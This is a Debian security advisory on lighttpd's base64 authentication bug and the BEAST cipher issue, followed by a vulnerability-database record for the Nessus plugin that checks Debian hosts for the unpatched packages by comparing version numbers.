Several vulnerabilities have been discovered in lighttpd, a small and fast webserver with minimal memory footprint.
- CVE-2011-4362 Xi Wang discovered that the base64 decoding routine which is used to decode user input during an HTTP authentication, suffers of a signedness issue when processing user input. As a result it is possible to force lighttpd to perform an out-of-bounds read which results in Denial of Service conditions.
- CVE-2011-3389 When using CBC ciphers on an SSL enabled virtual host to communicate with certain client, a so called 'BEAST' attack allows man-in-the-middle attackers to obtain plaintext HTTP traffic via a blockwise chosen-boundary attack (BCBA) on an HTTPS session. Technically this is no lighttpd vulnerability. However, lighttpd offers a workaround to mitigate this problem by providing a possibility to disable CBC ciphers.
This updates includes this option by default. System administrators are advised to read the NEWS file of this update (as this may break older clients).
{"id": "DEBIAN_DSA-2368.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Debian DSA-2368-1 : lighttpd - multiple vulnerabilities (BEAST)", "description": "Several vulnerabilities have been discovered in lighttpd, a small and fast webserver with minimal memory footprint.\n\n - CVE-2011-4362 Xi Wang discovered that the base64 decoding routine which is used to decode user input during an HTTP authentication, suffers of a signedness issue when processing user input. As a result it is possible to force lighttpd to perform an out-of-bounds read which results in Denial of Service conditions.\n\n - CVE-2011-3389 When using CBC ciphers on an SSL enabled virtual host to communicate with certain client, a so called 'BEAST' attack allows man-in-the-middle attackers to obtain plaintext HTTP traffic via a blockwise chosen-boundary attack (BCBA) on an HTTPS session. Technically this is no lighttpd vulnerability. However, lighttpd offers a workaround to mitigate this problem by providing a possibility to disable CBC ciphers.\n\n This updates includes this option by default. System administrators are advised to read the NEWS file of this update (as this may break older clients).", "published": "2012-01-12T00:00:00", "modified": "2022-12-05T00:00:00", "epss": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/57508", "reporter": "This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4362", "https://packages.debian.org/source/squeeze/lighttpd", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=652726", "https://security-tracker.debian.org/tracker/CVE-2011-3389", "https://www.debian.org/security/2011/dsa-2368", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", "https://security-tracker.debian.org/tracker/CVE-2011-4362"], "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "immutableFields": [], "lastseen": "2023-05-18T14:20:01", "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2011-010", "ALAS-2012-107"]}, {"type": "avleonov", "idList": ["AVLEONOV:317FBD7DA93C95993A9FFF38FB04A987"]}, {"type": "centos", "idList": ["CESA-2011:1380", "CESA-2012:1088", "CESA-2012:1089"]}, {"type": "cert", "idList": ["VU:864643"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2011-505", "CPAI-2012-020"]}, {"type": "checkpoint_security", "idList": ["CPS:SK86440"]}, {"type": "cve", "idList": ["CVE-2004-2770", "CVE-2011-3389", "CVE-2011-4362"]}, {"type": "debian", "idList": ["DEBIAN:DLA-154-1:C91BD", "DEBIAN:DLA-400-1:76CCE", "DEBIAN:DSA-2356-1:91E00", "DEBIAN:DSA-2358-1:F21E5", "DEBIAN:DSA-2368-1:91542", "DEBIAN:DSA-2381-:320B8", "DEBIAN:DSA-2398-1:A6208", "DEBIAN:DSA-2398-2:1A463"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2011-3389", "DEBIANCVE:CVE-2011-4362"]}, {"type": "exploitdb", "idList": ["EDB-ID:18295"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:184DA427E35F6E3E6D5AC9CCCC72148E"]}, {"type": "f5", "idList": ["F5:K13400", "SOL13400"]}, {"type": "fedora", "idList": ["FEDORA:04F1C20CB8", "FEDORA:1262420CBE", "FEDORA:179F720CEB", "FEDORA:1AC5420CC5", "FEDORA:200AC208B1", "FEDORA:206E92195B", "FEDORA:2490220CD3", "FEDORA:269F320D4C", "FEDORA:2A3D62083D", "FEDORA:2B4CF20C99", "FEDORA:2D2B820A5C", "FEDORA:2F07020CD7", "FEDORA:320272143B", "FEDORA:32C0C208B4", "FEDORA:37BAE20CD9", "FEDORA:4053B20CDA", "FEDORA:4329260E587A", "FEDORA:45E2C214D4", "FEDORA:462E6208E1", "FEDORA:4857E22DBD", "FEDORA:4867220AB1", "FEDORA:48FBB20CE9", "FEDORA:4FECC20A10", "FEDORA:5191B22DC7", "FEDORA:55FF821575", "FEDORA:5A57F22DE8", "FEDORA:5DDA721219", "FEDORA:62E9022DEA", "FEDORA:6BF3822E23", "FEDORA:7030920B10", "FEDORA:73438221A8", "FEDORA:7617922E25", "FEDORA:7EE8622E3A", "FEDORA:9D331212AC", "FEDORA:A2C3F213B0", "FEDORA:AD13120DB6", "FEDORA:B2BF02022D", "FEDORA:BFDED20E5F", "FEDORA:C5762206E3", "FEDORA:D4C3521434", "FEDORA:D68E221277", "FEDORA:DD57B208B1", "FEDORA:E779120CA7", "FEDORA:F036720CB7", "FEDORA:F332B2138D", "FEDORA:F38FB60CBEE0"]}, {"type": "freebsd", "idList": ["18CE9A90-F269-11E1-BE53-080027EF73EC", "559F3D1B-CB1D-11E5-80A4-001999F8D30B", "A4A809D8-25C8-11E1-B531-00215C6A37BB", "C6521B04-314B-11E1-9CF4-5404A67EEF98"]}, {"type": "gentoo", "idList": ["GLSA-201111-02", "GLSA-201203-02", "GLSA-201301-01", "GLSA-201406-10", "GLSA-201406-32"]}, {"type": "ibm", "idList": ["269B504D34D7B9BDD776A87F2BEC62D1CD4CA692AD0765FE50BEF0B6FFC0283F", "2E6D778793B990B68E72041D95DBC2B227927F08D97BCA9E118EC96F940B7A01", "30CDD497090F8940455238317492E01063AFC3CC537C3C8827026D302DFD0F4B", "4658C62A77F48A34C93A36AA5082184E598712E676A47847A2174B2175EB4DBB", "4BED10A9B77647D47155BEF6AEAE7754FE7B1E83A7CC5B95FC30366FA2805FDD", "54F08A3E75F1334BAEA6B9D028356C7A554BD574E0B0139E6023C9756DA9A6B6", "5EFA13785CC30ADD58A09C8067C048A172DF46A415459750DB97A4B2E8C6095E", "92BAA2CFDFFEAB55F3ED7EBC0A3EE5A881814F275C7B91CCF17EC9995E7DF59D", "B01B24DF5A7F0002B38E626E6EF764300467B3F3DDE12E0B8347CDC278D41400", "B5BA7A019881D4357D8DF943ED0F2EBF5D00B203B4AF8DE699E3A190780BD598", "B8E199CFC7A9C8DCF033928312B9AE0E344AB91916C93723350723B89FCB619A", "DDCE3DF1C0F2F3507A59F94E81A8ADEA101DC8CB5DCFAEE3754B7E7CBB0C41CB"]}, {"type": "ics", "idList": ["ICSA-14-098-03", "ICSA-19-192-04", "ICSMA-18-058-02"]}, {"type": "jvn", "idList": ["JVN:37417423"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-SSL-SSL_VERSION-"]}, {"type": "mskb", "idList": ["KB2643584"]}, {"type": "nessus", "idList": ["720302.PRM", "ALA_ALAS-2011-10.NASL", "ALA_ALAS-2012-107.NASL", "APPLE_IOS_50_CHECK.NBIN", "ASTERISK_AST_2016_003.NASL", "CENTOS_RHSA-2011-1380.NASL", "CENTOS_RHSA-2012-1088.NASL", "CENTOS_RHSA-2012-1089.NASL", "DEBIAN_DLA-154.NASL", "DEBIAN_DLA-400.NASL", "DEBIAN_DSA-2356.NASL", "DEBIAN_DSA-2358.NASL", "DEBIAN_DSA-2398.NASL", "FEDORA_2011-15020.NASL", "FEDORA_2011-15555.NASL", "FEDORA_2011-17399.NASL", "FEDORA_2011-17400.NASL", "FEDORA_2012-5785.NASL", "FEDORA_2012-5892.NASL", "FEDORA_2012-5916.NASL", "FEDORA_2012-5924.NASL", "FEDORA_2012-9040.NASL", "FEDORA_2012-9078.NASL", "FEDORA_2012-9135.NASL", "FEDORA_2014-13764.NASL", "FEDORA_2014-13777.NASL", "FREEBSD_PKG_18CE9A90F26911E1BE53080027EF73EC.NASL", "FREEBSD_PKG_559F3D1BCB1D11E580A4001999F8D30B.NASL", "FREEBSD_PKG_A4A809D825C811E1B53100215C6A37BB.NASL", "FREEBSD_PKG_C6521B04314B11E19CF45404A67EEF98.NASL", "GENTOO_GLSA-201111-02.NASL", "GENTOO_GLSA-201203-02.NASL", "GENTOO_GLSA-201301-01.NASL", "GENTOO_GLSA-201406-10.NASL", "GENTOO_GLSA-201406-32.NASL", "HPSMH_7_2_1_0.NASL", "KERIO_CONNECT_810.NASL", "LIGHTTPD_1_4_30.NASL", "MACOSX_10_7_3.NASL", "MACOSX_10_7_4.NASL", "MACOSX_10_7_5.NASL", "MACOSX_10_9.NASL", "MACOSX_JAVA_10_6_UPDATE6.NASL", "MACOSX_JAVA_10_7_UPDATE1.NASL", "MACOSX_SECUPD2012-001.NASL", "MACOSX_SECUPD2012-002.NASL", "MACOSX_SECUPD2012-004.NASL", "MACOSX_SECUPD2014-001.NASL", "MACOSX_XCODE_4_4.NASL", "MANDRIVA_MDVSA-2011-170.NASL", "MANDRIVA_MDVSA-2012-058.NASL", "MANDRIVA_MDVSA-2012-096.NASL", "MANDRIVA_MDVSA-2012-097.NASL", "MANDRIVA_MDVSA-2012-149.NASL", "MANDRIVA_MDVSA-2013-037.NASL", "OPENSUSE-2011-100.NASL", "OPENSUSE-2012-110.NASL", "OPENSUSE-2012-302.NASL", "OPENSUSE-2012-76.NASL", "OPENSUSE-2020-86.NASL", "OPERA_1151.NASL", "OPERA_1160.NASL", "ORACLELINUX_ELSA-2011-1380.NASL", "ORACLELINUX_ELSA-2012-1088.NASL", "ORACLELINUX_ELSA-2012-1089.NASL", "ORACLE_HTTP_SERVER_CPU_JAN_2015_LDAP.NASL", "ORACLE_JAVA_CPU_OCT_2011.NASL", "ORACLE_JAVA_CPU_OCT_2011_UNIX.NASL", "ORACLE_RDBMS_CPU_OCT_2013.NASL", "PHP_5_4_0.NASL", "REDHAT-RHSA-2011-1380.NASL", "REDHAT-RHSA-2011-1384.NASL", "REDHAT-RHSA-2012-0006.NASL", "REDHAT-RHSA-2012-0034.NASL", "REDHAT-RHSA-2012-0508.NASL", "REDHAT-RHSA-2012-1088.NASL", "REDHAT-RHSA-2012-1089.NASL", "REDHAT-RHSA-2013-1455.NASL", "SL_20111018_JAVA_1_6_0_OPENJDK_ON_SL5_X.NASL", "SL_20111019_JAVA_1_6_0_SUN_ON_SL5_X.NASL", "SL_20120717_FIREFOX_ON_SL5_X.NASL", "SL_20120717_THUNDERBIRD_ON_SL5_X.NASL", "SMB_KB2588513.NASL", "SMB_NT_MS12-006.NASL", "SOLARIS10_119213-27.NASL", "SOLARIS10_125358-15.NASL", "SOLARIS10_X86_119214-27.NASL", "SOLARIS10_X86_125359-15.NASL", "SOLARIS11_FETCHMAIL_20121016.NASL", "SOLARIS11_LIGHTTPD_20120417.NASL", "SOLARIS11_PYTHON_20130410.NASL", "SSL3_TLS1_IV_IMPL_INFO_DISCLOSURE.NASL", "SUSE_11_3_JAVA-1_6_0-OPENJDK-111025.NASL", "SUSE_11_3_JAVA-1_6_0-SUN-111024.NASL", "SUSE_11_3_NSS-201112-111220.NASL", "SUSE_11_3_OPERA-110906.NASL", "SUSE_11_4_CURL-120124.NASL", "SUSE_11_4_JAVA-1_6_0-OPENJDK-111025.NASL", "SUSE_11_4_JAVA-1_6_0-SUN-111024.NASL", "SUSE_11_4_LIGHTTPD-120130.NASL", "SUSE_11_4_NSS-201112-111220.NASL", "SUSE_11_4_OPERA-110906.NASL", "SUSE_11_JAVA-1_4_2-IBM-120105.NASL", "SUSE_11_JAVA-1_6_0-IBM-120223.NASL", "SUSE_JAVA-1_4_2-IBM-7908.NASL", "SUSE_JAVA-1_6_0-IBM-7926.NASL", "SUSE_LIBCURL4-8618.NASL", "SUSE_MOZILLA-NSS-7842.NASL", "SUSE_PYTHON-8080.NASL", "SUSE_SU-2020-0114-1.NASL", "SUSE_SU-2020-0234-1.NASL", "UBUNTU_USN-1263-1.NASL", "UBUNTU_USN-1263-2.NASL", "VMWARE_ESXI_5_1_BUILD_2323236_REMOTE.NASL", "VMWARE_VMSA-2012-0003.NASL", "VMWARE_VMSA-2012-0005.NASL", "VMWARE_VMSA-2012-0005_REMOTE.NASL", "WEB_APPLICATION_SCANNING_112355"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120270", "OPENVAS:1361412562310120500", "OPENVAS:1361412562310121000", "OPENVAS:1361412562310121213", "OPENVAS:1361412562310121235", "OPENVAS:1361412562310122071", "OPENVAS:136141256231070570", "OPENVAS:136141256231070571", "OPENVAS:136141256231070584", "OPENVAS:136141256231070592", "OPENVAS:136141256231070687", "OPENVAS:136141256231070715", "OPENVAS:136141256231070791", "OPENVAS:136141256231071186", "OPENVAS:136141256231071249", "OPENVAS:136141256231071832", "OPENVAS:1361412562310802332", "OPENVAS:1361412562310802333", "OPENVAS:1361412562310802392", "OPENVAS:1361412562310802794", "OPENVAS:1361412562310802830", "OPENVAS:1361412562310802968", "OPENVAS:1361412562310804851", "OPENVAS:1361412562310831493", "OPENVAS:1361412562310831573", "OPENVAS:1361412562310831685", "OPENVAS:1361412562310831686", "OPENVAS:1361412562310831731", "OPENVAS:1361412562310840805", "OPENVAS:1361412562310840872", "OPENVAS:1361412562310853008", "OPENVAS:1361412562310863588", "OPENVAS:1361412562310863593", "OPENVAS:1361412562310863690", "OPENVAS:1361412562310863691", "OPENVAS:1361412562310863692", "OPENVAS:1361412562310863693", "OPENVAS:1361412562310863694", "OPENVAS:1361412562310863695", "OPENVAS:1361412562310863696", "OPENVAS:1361412562310863697", "OPENVAS:1361412562310863698", "OPENVAS:1361412562310863699", "OPENVAS:1361412562310863748", "OPENVAS:1361412562310863798", "OPENVAS:1361412562310863804", "OPENVAS:1361412562310863904", "OPENVAS:1361412562310863916", "OPENVAS:1361412562310863955", "OPENVAS:1361412562310863960", "OPENVAS:1361412562310863977", "OPENVAS:1361412562310864037", "OPENVAS:1361412562310864068", "OPENVAS:1361412562310864070", "OPENVAS:1361412562310864088", "OPENVAS:1361412562310864199", "OPENVAS:1361412562310864218", "OPENVAS:1361412562310864223", "OPENVAS:1361412562310864317", "OPENVAS:1361412562310864384", "OPENVAS:1361412562310864392", "OPENVAS:1361412562310864457", "OPENVAS:1361412562310864471", "OPENVAS:1361412562310864472", "OPENVAS:1361412562310864477", "OPENVAS:1361412562310864498", "OPENVAS:1361412562310864513", "OPENVAS:1361412562310864684", "OPENVAS:1361412562310864710", "OPENVAS:1361412562310864791", "OPENVAS:1361412562310864793", "OPENVAS:1361412562310865053", "OPENVAS:1361412562310865325", "OPENVAS:1361412562310865329", "OPENVAS:1361412562310865336", "OPENVAS:1361412562310868456", "OPENVAS:1361412562310868477", "OPENVAS:1361412562310870501", "OPENVAS:1361412562310870790", "OPENVAS:1361412562310870792", "OPENVAS:1361412562310881023", "OPENVAS:1361412562310881160", "OPENVAS:1361412562310881168", "OPENVAS:1361412562310881187", "OPENVAS:1361412562310881201", "OPENVAS:1361412562310881447", "OPENVAS:1361412562310902630", "OPENVAS:1361412562310902900", "OPENVAS:70570", "OPENVAS:70571", "OPENVAS:70584", "OPENVAS:70592", "OPENVAS:70687", "OPENVAS:70715", "OPENVAS:70791", "OPENVAS:71186", "OPENVAS:71249", "OPENVAS:71832", "OPENVAS:802332", "OPENVAS:802333", "OPENVAS:802392", "OPENVAS:802794", "OPENVAS:802830", "OPENVAS:802968", "OPENVAS:831493", "OPENVAS:831573", "OPENVAS:831685", "OPENVAS:831686", "OPENVAS:831731", "OPENVAS:840805", "OPENVAS:840872", "OPENVAS:863588", "OPENVAS:863593", "OPENVAS:863690", "OPENVAS:863691", "OPENVAS:863692", "OPENVAS:863693", "OPENVAS:863694", "OPENVAS:863695", "OPENVAS:863696", "OPENVAS:863697", "OPENVAS:863698", "OPENVAS:863699", "OPENVAS:863748", "OPENVAS:863798", "OPENVAS:863804", "OPENVAS:863904", "OPENVAS:863916", "OPENVAS:863955", "OPENVAS:863960", "OPENVAS:863977", "OPENVAS:864037", "OPENVAS:864068", "OPENVAS:864070", "OPENVAS:864088", "OPENVAS:864199", "OPENVAS:864218", "OPENVAS:864223", "OPENVAS:864317", "OPENVAS:864384", "OPENVAS:864392", "OPENVAS:864457", "OPENVAS:864471", "OPENVAS:864472", "OPENVAS:864477", "OPENVAS:864498", "OPENVAS:864513", "OPENVAS:864684", "OPENVAS:864710", "OPENVAS:864791", "OPENVAS:864793", "OPENVAS:865053", "OPENVAS:865325", "OPENVAS:865329", "OPENVAS:865336", "OPENVAS:870501", "OPENVAS:870790", "OPENVAS:870792", "OPENVAS:881023", "OPENVAS:881160", "OPENVAS:881168", "OPENVAS:881187", "OPENVAS:881201", "OPENVAS:881447", "OPENVAS:902630", "OPENVAS:902900"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2015", "ORACLE:CPUJUL2015", "ORACLE:CPUOCT2013-1899837"]}, {"type": "oraclelinux", "idList": ["ELSA-2011-1380"]}, {"type": "osv", "idList": ["OSV:DLA-154-1", "OSV:DLA-400-1", "OSV:DSA-2356-1", "OSV:DSA-2358-1", "OSV:DSA-2368-1", "OSV:DSA-2398-1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7535985DCB1FBEA5FAF46D9453037D10"]}, {"type": "redhat", "idList": ["RHSA-2011:1380", "RHSA-2011:1384", "RHSA-2012:0006", "RHSA-2012:0034", "RHSA-2012:0343", "RHSA-2012:0508", "RHSA-2012:1088", "RHSA-2012:1089", "RHSA-2013:1455"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-3389-74829"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27151", "SECURITYVULNS:DOC:27154", "SECURITYVULNS:DOC:27283", "SECURITYVULNS:DOC:27485", "SECURITYVULNS:DOC:27504", "SECURITYVULNS:DOC:27600", "SECURITYVULNS:DOC:28232", "SECURITYVULNS:DOC:28577", "SECURITYVULNS:DOC:28706", "SECURITYVULNS:DOC:28707", "SECURITYVULNS:DOC:29602", "SECURITYVULNS:DOC:29623", "SECURITYVULNS:DOC:29856", "SECURITYVULNS:DOC:30335", "SECURITYVULNS:DOC:30412", "SECURITYVULNS:DOC:30448", "SECURITYVULNS:DOC:30449", "SECURITYVULNS:DOC:30611", "SECURITYVULNS:DOC:31682", "SECURITYVULNS:VULN:11971", "SECURITYVULNS:VULN:11972", "SECURITYVULNS:VULN:11988", "SECURITYVULNS:VULN:12116", "SECURITYVULNS:VULN:12137", "SECURITYVULNS:VULN:12164", "SECURITYVULNS:VULN:12518", "SECURITYVULNS:VULN:12679", "SECURITYVULNS:VULN:13186", "SECURITYVULNS:VULN:13198", "SECURITYVULNS:VULN:13310", "SECURITYVULNS:VULN:13423", "SECURITYVULNS:VULN:13583", "SECURITYVULNS:VULN:13647", "SECURITYVULNS:VULN:13663", "SECURITYVULNS:VULN:13730", "SECURITYVULNS:VULN:14233"]}, {"type": "seebug", "idList": ["SSV:20957", "SSV:24275", "SSV:26120", "SSV:30003", "SSV:60220", "SSV:60296", "SSV:72453"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0086-1", "SUSE-SU-2011:1256-2", "SUSE-SU-2012:0114-1", "SUSE-SU-2012:0114-2", "SUSE-SU-2012:0122-1", "SUSE-SU-2012:0122-2", "SUSE-SU-2012:0602-1"]}, {"type": "threatpost", "idList": ["THREATPOST:163A6E502D29C451AA1A20E62CA10C1C"]}, {"type": "ubuntu", "idList": ["USN-1263-1", "USN-1263-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-3389", "UB:CVE-2011-4362"]}, {"type": "veracode", "idList": ["VERACODE:13872", "VERACODE:13873", "VERACODE:13874", "VERACODE:13875", "VERACODE:13876", "VERACODE:13877", "VERACODE:13878", "VERACODE:13879", "VERACODE:13880", "VERACODE:13881", "VERACODE:13882", "VERACODE:13883", "VERACODE:13884", "VERACODE:13885", "VERACODE:13886", "VERACODE:13887", "VERACODE:14770", "VERACODE:3983"]}]}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2011-010"]}, {"type": "centos", "idList": ["CESA-2011:1380", "CESA-2012:1088", "CESA-2012:1089"]}, {"type": "cert", "idList": ["VU:864643"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2011-505"]}, {"type": "checkpoint_security", "idList": ["CPS:SK86440"]}, {"type": "cve", "idList": ["CVE-2011-3389", "CVE-2011-4362"]}, {"type": "debian", "idList": ["DEBIAN:DLA-400-1:76CCE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2011-3389"]}, {"type": "exploitdb", "idList": ["EDB-ID:18295"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:184DA427E35F6E3E6D5AC9CCCC72148E"]}, {"type": "f5", "idList": ["SOL13400"]}, {"type": "fedora", "idList": ["FEDORA:206E92195B", "FEDORA:2490220CD3", "FEDORA:4053B20CDA", "FEDORA:7617922E25", "FEDORA:DD57B208B1", "FEDORA:E779120CA7"]}, {"type": "freebsd", "idList": ["18CE9A90-F269-11E1-BE53-080027EF73EC", "A4A809D8-25C8-11E1-B531-00215C6A37BB", "C6521B04-314B-11E1-9CF4-5404A67EEF98"]}, {"type": "gentoo", "idList": ["GLSA-201203-02"]}, {"type": "ibm", "idList": ["DDCE3DF1C0F2F3507A59F94E81A8ADEA101DC8CB5DCFAEE3754B7E7CBB0C41CB"]}, {"type": "ics", "idList": ["ICSA-19-192-04"]}, {"type": "jvn", "idList": ["JVN:37417423"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/VMSA-2012-0005-CVE-2011-3389/"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-2358.NASL", "FREEBSD_PKG_C6521B04314B11E19CF45404A67EEF98.NASL", "GENTOO_GLSA-201111-02.NASL", "MACOSX_10_7_5.NASL", "MANDRIVA_MDVSA-2012-096.NASL", "OPENSUSE-2012-76.NASL", "OPENSUSE-2020-86.NASL", "REDHAT-RHSA-2012-0006.NASL", "REDHAT-RHSA-2012-0034.NASL", "REDHAT-RHSA-2012-0508.NASL", "SUSE_11_4_OPERA-110906.NASL", "SUSE_SU-2020-0114-1.NASL", "VMWARE_VMSA-2012-0005_REMOTE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310107444", "OPENVAS:136141256231071249", "OPENVAS:1361412562310831686", "OPENVAS:1361412562310831731", "OPENVAS:1361412562310863694", "OPENVAS:1361412562310864037", "OPENVAS:1361412562310864384", "OPENVAS:70791", "OPENVAS:863691"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2015-2367936"]}, {"type": "oraclelinux", "idList": ["ELSA-2011-1380"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7535985DCB1FBEA5FAF46D9453037D10"]}, {"type": "redhat", "idList": ["RHSA-2012:0508"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27154", "SECURITYVULNS:DOC:28707", "SECURITYVULNS:VULN:13310"]}, {"type": "seebug", "idList": ["SSV:72453"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0086-1", "SUSE-SU-2012:0122-1"]}, {"type": "ubuntu", "idList": ["USN-1263-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-3389"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2011-3389", "epss": 0.00211, "percentile": 0.57517, "modified": "2023-05-06"}, {"cve": "CVE-2011-4362", "epss": 0.02264, "percentile": 0.87943, "modified": "2023-05-06"}], "vulnersScore": 0.1}, "_state": {"dependencies": 1684423147, "score": 1684425491, "epss": 0}, "_internal": {"score_hash": "983a9de2069a2dacc2becf377cdb54c6"}, "pluginID": "57508", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2368. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57508);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-4362\");\n script_bugtraq_id(49778, 50851);\n script_xref(name:\"DSA\", value:\"2368\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"Debian DSA-2368-1 : lighttpd - multiple vulnerabilities (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Several vulnerabilities have been discovered in lighttpd, a small and\nfast webserver with minimal memory footprint.\n\n - CVE-2011-4362\n Xi Wang discovered that the base64 decoding routine\n which is used to decode user input during an HTTP\n authentication, suffers of a signedness issue when\n processing user input. As a result it is possible to\n force lighttpd to perform an out-of-bounds read which\n results in Denial of Service conditions.\n\n - CVE-2011-3389\n When using CBC ciphers on an SSL enabled virtual host to\n communicate with certain client, a so called 'BEAST'\n attack allows man-in-the-middle attackers to obtain\n plaintext HTTP traffic via a blockwise chosen-boundary\n attack (BCBA) on an HTTPS session. Technically this is\n no lighttpd vulnerability. However, lighttpd offers a\n workaround to mitigate this problem by providing a\n possibility to disable CBC ciphers.\n\n This updates includes this option by default. System administrators\n are advised to read the NEWS file of this update (as this may break\n older clients).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=652726\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2011-4362\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2011-3389\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/squeeze/lighttpd\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2011/dsa-2368\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the lighttpd packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19-5+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"lighttpd\", reference:\"1.4.19-5+lenny3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-doc\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-cml\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-magnet\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-mysql-vhost\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-trigger-b4-dl\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-webdav\", reference:\"1.4.28-2+squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "cpe": ["p-cpe:/a:debian:debian_linux:lighttpd", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:6.0"], "solution": "Upgrade the lighttpd packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in version 1.4.19-5+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in version 1.4.28-2+squeeze1.", "nessusSeverity": "Medium", "cvssScoreSource": "", "vendor_cvss2": {"score": 5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "vendor_cvss3": {"score": null, "vector": null}, "vpr": 